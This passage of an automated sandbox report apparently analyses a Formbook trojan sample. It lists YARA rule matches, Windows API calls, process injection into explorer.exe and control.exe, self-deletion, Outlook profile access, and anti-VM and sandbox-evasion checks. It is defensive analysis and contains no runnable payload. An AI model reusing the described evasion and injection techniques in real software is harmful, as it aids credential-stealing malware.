        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0265CD040_2_0265CD04
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0265F0D00_2_0265F0D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_053741D00_2_053741D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07095DF00_2_07095DF0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_070955B80_2_070955B8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_070955C80_2_070955C8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_070963430_2_07096343
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07096FC80_2_07096FC8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07095DE10_2_07095DE1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BF9006_2_015BF900
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D41206_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168E8246_2_0168E824
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016710026_2_01671002
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA8306_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016828EC6_2_016828EC
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016820A86_2_016820A8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB0906_2_015CB090
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A06_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAB406_2_015DAB40
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01682B286_2_01682B28
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA3096_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E36_2_016623E3
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EABD86_2_015EABD8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167DBD26_2_0167DBD2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016703DA6_2_016703DA
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EEBB06_2_015EEBB0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FA2B6_2_0166FA2B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016822AE6_2_016822AE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01681D556_2_01681D55
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01682D076_2_01682D07
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B0D206_2_015B0D20
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016825DD6_2_016825DD
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E06_2_015CD5E0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E25816_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D826_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167D4666_2_0167D466
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C841F6_2_015C841F
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016744966_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01681FF16_2_01681FF1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168DFCE6_2_0168DFCE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D6E306_2_015D6E30
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167D6166_2_0167D616
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01682EF76_2_01682EF7
        Source: C:\Users\user\Desktop\vbc.exeCode function: String function: 015BB150 appears 133 times
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_015F9910
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F99A0 NtCreateSection,LdrInitializeThunk,6_2_015F99A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9840 NtDelayExecution,LdrInitializeThunk,6_2_015F9840
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9860 NtQuerySystemInformation,LdrInitializeThunk,6_2_015F9860
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F98F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_015F98F0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A50 NtCreateFile,LdrInitializeThunk,6_2_015F9A50
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_015F9A00
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A20 NtResumeThread,LdrInitializeThunk,6_2_015F9A20
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9540 NtReadFile,LdrInitializeThunk,6_2_015F9540
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F95D0 NtClose,LdrInitializeThunk,6_2_015F95D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9710 NtQueryInformationToken,LdrInitializeThunk,6_2_015F9710
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9FE0 NtCreateMutant,LdrInitializeThunk,6_2_015F9FE0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9780 NtMapViewOfSection,LdrInitializeThunk,6_2_015F9780
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F97A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_015F97A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_015F9660
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F96E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_015F96E0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9950 NtQueueApcThread,6_2_015F9950
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F99D0 NtCreateProcessEx,6_2_015F99D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FB040 NtSuspendThread,6_2_015FB040
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9820 NtEnumerateKey,6_2_015F9820
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F98A0 NtWriteVirtualMemory,6_2_015F98A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9B00 NtSetValueKey,6_2_015F9B00
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FA3B0 NtGetContextThread,6_2_015FA3B0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A10 NtQuerySection,6_2_015F9A10
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A80 NtOpenDirectoryObject,6_2_015F9A80
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9560 NtWriteFile,6_2_015F9560
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FAD30 NtSetContextThread,6_2_015FAD30
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9520 NtWaitForSingleObject,6_2_015F9520
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F95F0 NtQueryInformationFile,6_2_015F95F0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FA770 NtOpenThread,6_2_015FA770
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9770 NtSetInformationFile,6_2_015F9770
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9760 NtOpenProcess,6_2_015F9760
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FA710 NtOpenProcessToken,6_2_015FA710
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9730 NtQueryVirtualMemory,6_2_015F9730
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9650 NtQueryValueKey,6_2_015F9650
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9670 NtQueryInformationProcess,6_2_015F9670
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9610 NtEnumerateValueKey,6_2_015F9610
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F96D0 NtCreateKey,6_2_015F96D0
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000002.415770591.0000000006E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000000.362679786.00000000004D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
        Source: vbc.exe, 00000000.00000002.415918626.0000000006EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
        Source: vbc.exe, 00000000.00000002.416361250.0000000007010000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
        Source: vbc.exe, 00000006.00000003.407195484.0000000001513000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe, 00000006.00000003.404813945.0000000001373000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe, 00000006.00000002.500864587.00000000016AF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exeBinary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
        Source: vbc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: vbc.exeReversingLabs: Detection: 31%
        Source: vbc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exeJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exeJump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\vbc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.logJump to behavior
        Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\4-9E1JJIJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/2@4/3
        Source: vbc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: vbc.exe, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: vbc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: vbc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: vbc.exe, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0160D0D1 push ecx; ret 6_2_0160D0E4
        Source: initial sampleStatic PE information: section name: .text entropy: 7.777091407724558

        Hooking and other Techniques for Hiding and Protection

        barindex
        Deletes itself after installation
        Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\vbc.exeJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Users\user\Desktop\vbc.exe TID: 3304Thread sleep time: -45877s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\vbc.exe TID: 2700Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01685BA5 rdtsc 6_2_01685BA5
        Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\vbc.exeAPI coverage: 4.4 %
        Source: C:\Users\user\Desktop\vbc.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 45877Jump to behavior
        Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
